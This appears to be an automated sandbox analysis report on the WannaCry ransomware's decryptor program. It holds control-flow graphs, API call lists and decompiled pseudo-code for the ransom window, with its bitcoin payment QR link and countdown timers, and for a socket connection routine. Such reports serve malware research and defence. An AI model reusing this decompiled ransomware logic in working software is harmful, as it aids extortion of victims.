6452->6453 6093 409920 6098 4098c0 6093->6098 6096 409938 6097 40992f #825 6097->6096 6099 4098f2 #5875 6098->6099 6100 4098fb 6098->6100 6099->6100 6100->6096 6100->6097 5949 408c20 5954 408b40 5949->5954 5951 408c28 5952 408c38 5951->5952 5953 408c2f #825 5951->5953 5953->5952 5955 408bd0 5954->5955 5956 408b78 BitBlt 5954->5956 5958 408bd6 #2414 #640 5955->5958 5959 408bc1 #5785 5956->5959 5960 408bb5 #5785 5956->5960 5958->5951 5959->5958 5960->5958 5589 401220 5590 4012c2 #2379 5589->5590 5591 401233 5589->5591 5592 401243 SendMessageA KillTimer #4853 5591->5592 5593 40126b SendMessageA 5591->5593 5592->5593 5594 401285 SendMessageA 5593->5594 5595 401297 5593->5595 5594->5595 5595->5590 5596 4012a1 SendMessageA 5595->5596 5596->5590 5597 4012b8 5596->5597 5597->5590 6214 405a20 6215 405a25 6214->6215 6218 4130bb 6215->6218 6221 41308f 6218->6221 6220 405a4a 6222 4130a4 __dllonexit 6221->6222 6223 413098 _onexit 6221->6223 6222->6220 6223->6220 6232 404620 #795 6233 404638 6232->6233 6234 40462f #825 6232->6234 6234->6233 5961 413427 5962 41342c 5961->5962 5965 4133fe #1168 5962->5965 5966 413421 5965->5966 5967 413418 _setmbcp 5965->5967 5967->5966 5971 407c30 OpenClipboard 5972 407c42 GlobalAlloc 5971->5972 5973 407ca9 5971->5973 5974 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5972->5974 5975 407c5b CloseClipboard 5972->5975 5974->5973 5968 40d830 inet_addr 5969 40d844 gethostbyname 5968->5969 5970 40d84f 5968->5970 5969->5970 5976 404430 5977 40447b 5976->5977 5978 40443d _TrackMouseEvent #2379 5976->5978 5981 404489 5977->5981 5983 404530 5977->5983 5982 4044a1 SetCursor #2379 5981->5982 5984 4045c1 5983->5984 5985 404552 5983->5985 5984->5981 5985->5984 5986 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5985->5986 5986->5984 6105 406930 #6215 6106 402d30 6107 402d73 #825 6106->6107 6108 402d3f 6106->6108 6109 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6108->6109 6109->6109 
6110 402d72 6109->6110 6110->6107 6235 405230 6242 405369 6235->6242 6245 40525a 6235->6245 6236 405552 InvalidateRect 6241 405560 6236->6241 6237 405285 6238 4052ee 7 API calls 6237->6238 6239 40528f #4277 #923 #858 #800 #800 6237->6239 6238->6236 6239->6236 6240 40539e 6243 405430 6240->6243 6244 4053aa 7 API calls 6240->6244 6242->6236 6242->6240 6249 405390 #940 6242->6249 6246 4054b4 6243->6246 6247 405435 7 API calls 6243->6247 6244->6236 6245->6237 6248 405277 #940 6245->6248 6250 4054b8 6246->6250 6252 405503 6246->6252 6247->6236 6248->6237 6248->6248 6249->6240 6249->6249 6250->6236 6251 4054de #6778 #6648 6250->6251 6251->6251 6253 405501 6251->6253 6252->6236 6252->6241 6254 405529 #6778 #6648 6252->6254 6253->6236 6254->6236 6254->6254 6255 40d630 6260 40d650 6255->6260 6257 40d638 6258 40d648 6257->6258 6259 40d63f #825 6257->6259 6259->6258 6261 40dad0 4 API calls 6260->6261 6262 40d680 6261->6262 6262->6257 6111 402531 6112 402543 6111->6112 6113 40253c CloseHandle 6111->6113 6114 402555 6112->6114 6115 40254e CloseHandle 6112->6115 6113->6112 6115->6114 6263 40ca3a 6266 40ca40 6263->6266 6264 40ca81 6265 40ca87 #825 6265->6264 6266->6264 6266->6265 5987 4068c0 #4837 6267 4032c0 6 API calls 6268 403334 SendMessageA #3092 6267->6268 6270 40335c SendMessageA #3092 6268->6270 6272 40337b SendMessageA #3092 6270->6272 6274 4033a0 SendMessageA 6272->6274 6275 40339d 6272->6275 6278 403cb0 FindFirstFileA 6274->6278 6275->6274 6277 4033b2 SendMessageA #3996 SendMessageA 6279 403cd9 6278->6279 6280 403ce3 6278->6280 6279->6277 6281 403e1f FindNextFileA 6280->6281 6283 403d14 sscanf 6280->6283 6281->6280 6282 403e3a FindClose 6281->6282 6282->6277 6283->6281 6284 403d38 fopen 6283->6284 6284->6281 6285 403d5c fread 6284->6285 6286 403e15 fclose 6285->6286 6290 403d7b 6285->6290 6286->6281 6287 403d8f sprintf 6288 403dd4 SendMessageA #823 SendMessageA 6287->6288 6288->6286 6290->6286 6290->6287 6290->6288 6291 401c30 inet_ntoa 6290->6291 6291->6290 6454 
4043c0 #6453 #2414 6455 409fc0 TextOutA 5122 4064d0 #4710 SendMessageA SendMessageA 5165 401c70 wcscat 5122->5165 5124 406516 5125 406577 5124->5125 5126 40651d GetModuleFileNameA strrchr 5124->5126 5174 401a10 5125->5174 5127 40656c SetCurrentDirectoryA 5126->5127 5128 40655d strrchr 5126->5128 5127->5125 5128->5127 5130 406585 5131 4065e5 5130->5131 5132 40658c time 5130->5132 5184 402c40 5131->5184 5133 401a10 5 API calls 5132->5133 5133->5131 5135 4065ed __p___argc 5136 406606 5135->5136 5137 40678c 5136->5137 5138 40660f __p___argv 5136->5138 5190 407e80 SHGetFolderPathW wcslen 5137->5190 5140 406621 5138->5140 5143 406661 __p___argv 5140->5143 5144 406652 5140->5144 5141 406793 SetWindowTextW 5193 406f80 5141->5193 5147 40666d 5143->5147 5260 407f80 fopen 5144->5260 5145 4067a9 5251 406c20 GetUserDefaultLangID GetLocaleInfoA 5145->5251 5151 4066ad __p___argv 5147->5151 5152 40669e 5147->5152 5150 4067b0 SetTimer SetTimer 5154 4066b9 5151->5154 5270 4080c0 FindFirstFileA 5152->5270 5154->5137 5156 4066ee Sleep 5154->5156 5288 401bb0 AllocateAndInitializeSid 5156->5288 5158 406734 5159 406750 sprintf 5158->5159 5160 406738 5158->5160 5294 401a90 CreateProcessA 5159->5294 5293 401b50 ShellExecuteExA 5160->5293 5163 40674b ExitProcess 5166 401cdc 5165->5166 5167 401d00 RegCreateKeyW 5166->5167 5168 401d62 RegQueryValueExA 5166->5168 5169 401d1d GetCurrentDirectoryA RegSetValueExA 5166->5169 5170 401dbb 5166->5170 5167->5166 5171 401d9e RegCloseKey 5168->5171 5172 401d90 SetCurrentDirectoryA 5168->5172 5169->5171 5170->5124 5171->5166 5173 401dc8 5171->5173 5172->5171 5173->5124 5175 401a1a fopen 5174->5175 5177 401a3a 5175->5177 5178 401a6f 5175->5178 5179 401a53 fwrite 5177->5179 5180 401a46 fread 5177->5180 5178->5130 5181 401a5e 5179->5181 5180->5181 5182 401a74 fclose 5181->5182 5183 401a66 fclose 5181->5183 5182->5130 5183->5178 5302 404b70 5184->5302 5186 402c46 5187 402c57 5186->5187 5188 402c5e LoadLibraryA 5186->5188 5187->5135 5188->5187 5189 402c73 7 

                                  Control-flow Graph

                                  Function 00406F80 (range 406f80-407117). Legend: Executed / Not Executed.
                                  C-Code - Quality: 62%
                                  			E00406F80(void* __ecx, void* __fp0) {
                                  				struct HFONT__* _t135;
                                  				long _t137;
                                  				long _t138;
                                  				long _t139;
                                  				long _t141;
                                  				long _t142;
                                  				long _t143;
                                  				long _t145;
                                  				long _t146;
                                  				long _t147;
                                  				long _t149;
                                  				void* _t214;
                                  				int _t216;
                                  				int _t235;
                                  				int _t238;
                                  				int _t240;
                                  				int _t242;
                                  				int _t245;
                                  				int _t248;
                                  				int _t251;
                                  				int _t253;
                                  				void* _t260;
                                  				void* _t262;
                                  				int _t339;
                                  				void* _t348;
                                  				int _t352;
                                  				intOrPtr _t355;
                                  				intOrPtr _t356;
                                  				intOrPtr _t357;
                                  				intOrPtr _t358;
                                  				void* _t359;
                                  				void* _t360;
                                  				void* _t361;
                                  				void* _t375;
                                  
                                  				_t375 = __fp0;
                                  				_push(0xffffffff);
                                  				_push(E00413E9B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t355;
                                  				_t356 = _t355 - 0xd4;
                                  				_t348 = __ecx;
                                  				_push(0);
                                  				E004076A0(__ecx);
                                  				_push(CreateSolidBrush(0xe0));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0x121284));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0xe000));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0xe00000));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0x3834d1));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0x107c10));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0xe8a200));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0xd77800));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0x3cda));
                                  				L00412D5E();
                                  				_t339 = __ecx + 0x880;
                                  				_push(CreateFontA(0x18, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
                                  				L00412D5E();
                                  				_t216 = __ecx + 0x888;
                                  				_push(CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
                                  				L00412D5E();
                                  				_t352 = __ecx + 0x890;
                                  				_t135 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                  				_push(_t135);
                                  				L00412D5E();
                                  				_push(0x3ed);
                                  				L00412CE6();
                                  				if(_t339 != 0) {
                                  					_t339 =  *(_t339 + 4);
                                  				}
                                  				_t137 = SendMessageA( *(_t135 + 0x20), 0x30, _t339, 1);
                                  				_push(0x3fe);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t235 =  *(_t216 + 4);
                                  				} else {
                                  					_t235 = 0;
                                  				}
                                  				_t138 = SendMessageA( *(_t137 + 0x20), 0x30, _t235, 1);
                                  				_push(0x3fb);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t238 =  *(_t216 + 4);
                                  				} else {
                                  					_t238 = 0;
                                  				}
                                  				_t139 = SendMessageA( *(_t138 + 0x20), 0x30, _t238, 1);
                                  				_push(0x3ff);
                                  				L00412CE6();
                                  				if(_t352 != 0) {
                                  					_t240 =  *(_t352 + 4);
                                  				} else {
                                  					_t240 = 0;
                                  				}
                                  				_t141 = SendMessageA( *(_t139 + 0x20), 0x30, _t240, 1);
                                  				_push(0x3fc);
                                  				L00412CE6();
                                  				if(_t352 != 0) {
                                  					_t242 =  *(_t352 + 4);
                                  				} else {
                                  					_t242 = 0;
                                  				}
                                  				_t142 = SendMessageA( *(_t141 + 0x20), 0x30, _t242, 1);
                                  				_push(0x400);
                                  				L00412CE6();
                                  				if(_t352 != 0) {
                                  					_t245 =  *(_t352 + 4);
                                  				} else {
                                  					_t245 = 0;
                                  				}
                                  				_t143 = SendMessageA( *(_t142 + 0x20), 0x30, _t245, 1);
                                  				_push(0x3fa);
                                  				L00412CE6();
                                  				if(_t352 != 0) {
                                  					_t352 =  *(_t352 + 4);
                                  				}
                                  				_t145 = SendMessageA( *(_t143 + 0x20), 0x30, _t352, 1);
                                  				_push(0x402);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t248 =  *(_t216 + 4);
                                  				} else {
                                  					_t248 = 0;
                                  				}
                                  				_t146 = SendMessageA( *(_t145 + 0x20), 0x30, _t248, 1);
                                  				_push(0x3ef);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t251 =  *(_t216 + 4);
                                  				} else {
                                  					_t251 = 0;
                                  				}
                                  				_t147 = SendMessageA( *(_t146 + 0x20), 0x30, _t251, 1);
                                  				_push(0x3eb);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t253 =  *(_t216 + 4);
                                  				} else {
                                  					_t253 = 0;
                                  				}
                                  				_t149 = SendMessageA( *(_t147 + 0x20), 0x30, _t253, 1);
                                  				_push(0x3ec);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t216 =  *(_t216 + 4);
                                  				}
                                  				SendMessageA( *(_t149 + 0x20), 0x30, _t216, 1);
                                  				_push(_t348 + 0x5be);
                                  				L00412DA0();
                                  				E00404260(_t348 + 0x228,  *(_t348 + 0x824) ^ 0x00ffffff);
                                  				E00404260(_t348 + 0x290,  *(_t348 + 0x824) ^ 0x00ffffff);
                                  				E00404260(_t348 + 0x2f8,  *(_t348 + 0x824) ^ 0x00ffffff);
                                  				_t260 = _t348 + 0x360;
                                  				E00404260(_t260,  *(_t348 + 0x824) ^ 0x00ffffff);
                                  				_push(_t260);
                                  				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
                                  				L00412CAA();
                                  				_t262 = _t348 + 0x228;
                                  				E00404210(_t262, "https://en.wikipedia.org/wiki/Bitcoin");
                                  				_push(_t262);
                                  				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
                                  				L00412CAA();
                                  				E00404210(_t348 + 0x290, "https://www.google.com/search?q=how+to+buy+bitcoin");
                                  				L00412DA6();
                                  				_push(_t348 + 0x58c);
                                  				_push("mailto:%s");
                                  				_push(_t356 + 0x10);
                                  				 *(_t356 + 0xf8) = 0;
                                  				L00412E00();
                                  				_t357 = _t356 + 8;
                                  				 *((intOrPtr*)(_t357 + 0x18)) = _t357;
                                  				L00412F56();
                                  				E00404210(_t348 + 0x2f8, _t357 + 0x14);
                                  				E00404270(_t348 + 0x888);
                                  				_push( *((intOrPtr*)(_t348 + 0x508)));
                                  				_push("http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s");
                                  				_push(_t357 + 0x10); // executed
                                  				L00412E00(); // executed
                                  				_t358 = _t357 + 8;
                                  				 *((intOrPtr*)(_t358 + 0x18)) = _t358;
                                  				L00412F56();
                                  				E00404210(_t348 + 0x360, _t358 + 0x14);
                                  				SendMessageA( *(_t348 + 0x140), 0x406, 0, 0x64);
                                  				SendMessageA( *(_t348 + 0x1c4), 0x406, 0, 0x64);
                                  				_push(0xffffffff);
                                  				_push(2);
                                  				L00412F50();
                                  				_push(0xffffffff);
                                  				_push(2);
                                  				 *( *(_t348 + 0x164)) = 0xe0;
                                  				( *(_t348 + 0x164))[1] = 0xe000;
                                  				L00412F50();
                                  				 *( *(_t348 + 0x1e8)) = 0xe0;
                                  				( *(_t348 + 0x1e8))[1] = 0xe000;
                                  				_t342 = _t348 + 0x3c8;
                                  				E00405820(_t348 + 0x3c8, 1);
                                  				E00405800(_t348 + 0x3c8, 0xb);
                                  				E00405200(_t348 + 0x3c8, 0);
                                  				_push( *(_t348 + 0x824));
                                  				E00405920(_t348 + 0x3c8,  *(_t348 + 0x824), 0xffffff);
                                  				E00405860(_t342, 0xb);
                                  				E004058C0(_t342, 1);
                                  				E00405990(_t342, 1, 0x20);
                                  				E00405180(_t342, "00;00;00;00");
                                  				_t343 = _t348 + 0x444;
                                  				E00405820(_t348 + 0x444, 1);
                                  				E00405800(_t348 + 0x444, 0xb);
                                  				E00405200(_t348 + 0x444, 0);
                                  				_push( *(_t348 + 0x824));
                                  				E00405920(_t348 + 0x444,  *(_t348 + 0x824), 0xffffff);
                                  				E00405860(_t343, 0xb);
                                  				E004058C0(_t343, 1);
                                  				E00405990(_t343, 1, 0x20);
                                  				E00405180(_t343, "00;00;00;00");
                                  				GetTimeZoneInformation(_t358 + 0x38); // executed
                                  				_push(_t358 + 0x28);
                                  				E00401E60(_t375, ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
                                  				_t359 = _t358 + 8;
                                  				SystemTimeToTzSpecificLocalTime(_t359 + 0x3c, _t359 + 0x28, _t359 + 0x18); // executed
                                  				_push( *(_t359 + 0x24) & 0x0000ffff);
                                  				_push( *(_t359 + 0x22) & 0x0000ffff);
                                  				_push( *(_t359 + 0x20) & 0x0000ffff);
                                  				_push( *(_t359 + 0x1c) & 0x0000ffff);
                                  				_push( *(_t359 + 0x26) & 0x0000ffff);
                                  				_push( *(_t359 + 0x26) & 0x0000ffff);
                                  				_push("%d/%d/%d %02d:%02d:%02d");
                                  				_push(_t348 + 0x500);
                                  				L00412E00();
                                  				_push(_t359 + 0x48);
                                  				E00401E60(_t375, ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
                                  				_t360 = _t359 + 0x28;
                                  				SystemTimeToTzSpecificLocalTime(_t360 + 0x38, _t360 + 0x28, _t360 + 0x18); // executed
                                  				_push( *(_t360 + 0x24) & 0x0000ffff);
                                  				_push( *(_t360 + 0x22) & 0x0000ffff);
                                  				_push( *(_t360 + 0x20) & 0x0000ffff);
                                  				_push( *(_t360 + 0x20) & 0x0000ffff);
                                  				_push( *(_t360 + 0x26) & 0x0000ffff);
                                  				_push( *(_t360 + 0x26) & 0x0000ffff);
                                  				_t214 = _t348 + 0x504;
                                  				_push("%d/%d/%d %02d:%02d:%02d");
                                  				_push(_t214);
                                  				L00412E00();
                                  				_t361 = _t360 + 0x20;
                                  				_push(0); // executed
                                  				L00412E06(); // executed
                                  				 *((intOrPtr*)(_t361 + 0xec)) = 0xffffffff;
                                  				L00412CC2();
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t361 + 0xe4));
                                  				return _t214;
                                  			}

                                  APIs
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FBC
                                  • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FCF
                                  • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FE2
                                  • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FF5
                                  • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407005
                                  • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407018
                                  • CreateSolidBrush.GDI32(00107C10), ref: 00407022
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040702B
                                  • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040703E
                                  • CreateSolidBrush.GDI32(00D77800), ref: 00407048
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407051
                                  • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407064
                                  • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040709C
                                  • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 004070CE
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407104
                                  • #3092.MFC42(000003ED,00000000,?,765920C0,?), ref: 00407110
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
                                  • #3092.MFC42(000003FE,?,765920C0,?), ref: 00407134
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
                                  • #3092.MFC42(000003FB,?,765920C0,?), ref: 00407156
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
                                  • #3092.MFC42(000003FF,?,765920C0,?), ref: 00407178
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
                                  • #3092.MFC42(000003FC,?,765920C0,?), ref: 0040719A
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
                                  • #3092.MFC42(00000400,?,765920C0,?), ref: 004071BC
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
                                  • #3092.MFC42(000003FA,?,765920C0,?), ref: 004071DE
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
                                  • #3092.MFC42(00000402,?,765920C0,?), ref: 004071FC
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
                                  • #3092.MFC42(000003EF,?,765920C0,?), ref: 0040721E
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
                                  • #3092.MFC42(000003EB,?,765920C0,?), ref: 00407240
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
                                  • #3092.MFC42(000003EC,?,765920C0,?), ref: 00407262
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
                                  • #860.MFC42(?,?,765920C0,?), ref: 00407288
                                  • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,765920C0,?), ref: 004072F9
                                  • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,765920C0,?), ref: 00407315
                                  • #540.MFC42(?,?,?,?,765920C0,?), ref: 00407329
                                  • #2818.MFC42(?,mailto:%s,?,?,?,?,?,765920C0,?), ref: 0040734A
                                  • #535.MFC42(?), ref: 0040735D
                                  • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
                                  • #535.MFC42(?), ref: 00407398
                                    • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
                                    • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
                                  • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
                                  • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
                                  • #6140.MFC42(00000002,000000FF), ref: 004073D6
                                  • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
                                    • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
                                    • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                    • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
                                    • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                    • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
                                    • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
                                    • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                    • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  • GetTimeZoneInformation.KERNELBASE(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
                                    • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 00407520
                                  • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 004075AD
                                  • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
                                  • #6334.MFC42(00000000), ref: 00407607
                                  • #800.MFC42 ref: 0040761B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641CreateMessageSend$#3092$BrushSolid$Time$#2818$FontRectSystem$#535#537#6140#6197#800#860ClientLocalSpecific$#540#6334#858InformationInvalidateRedrawVariantWindowZone_mbscmptime
                                  • String ID: %d/%d/%d %02d:%02d:%02d$00;00;00;00$Arial$http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s$https://en.wikipedia.org/wiki/Bitcoin$https://www.google.com/search?q=how+to+buy+bitcoin$mailto:%s
                                  • API String ID: 28786460-3869059234
                                  • Opcode ID: 200e83b7d3820b486b06c35be801168636e9bf215e2def9df31dd5cd78b3127c
                                  • Instruction ID: 980e8df72422c457d288d06354c1d21c6ecb0c69e0d4732a7e3947204bb0ebed
                                  • Opcode Fuzzy Hash: 200e83b7d3820b486b06c35be801168636e9bf215e2def9df31dd5cd78b3127c
                                  • Instruction Fuzzy Hash: DB02D3B0344705ABD624EB61CC92FBF339AAFC4B04F00452DF2566B2D1DEB8B5058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 360 40d6a0-40d6ed htons socket 361 40d6f3-40d711 bind 360->361 362 40d814-40d821 360->362 363 40d717-40d72c ioctlsocket 361->363 364 40d809-40d80b 361->364 363->364 365 40d732-40d789 connect select 363->365 364->362 366 40d80d-40d80e closesocket 364->366 365->364 367 40d78b-40d798 __WSAFDIsSet 365->367 366->362 368 40d79a-40d7aa __WSAFDIsSet 367->368 369 40d7ac-40d806 ioctlsocket setsockopt * 2 367->369 368->364 368->369
                                  APIs
                                  • htons.WS2_32 ref: 0040D6C7
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                  • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                  • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                  • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                  • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                  • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                  • closesocket.WS2_32(00000000), ref: 0040D80E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                  • String ID: `
                                  • API String ID: 478405425-1850852036
                                  • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                  • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00407E80() {
                                  				void _v518;
                                  				short _v520;
                                  				short _v540;
                                  				void _v1038;
                                  				char _v1040;
                                  				long _v1060;
                                  				void _v1558;
                                  				short _v1560;
                                  				long _v1580;
                                  				int _t23;
                                  				short _t39;
                                  				void* _t42;
                                  				void* _t54;
                                  				void* _t55;
                                  
                                  				_t39 =  *0x42179c; // 0x0
                                  				_v1040 = _t39;
                                  				memset( &_v1038, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				_v1560 = _t39;
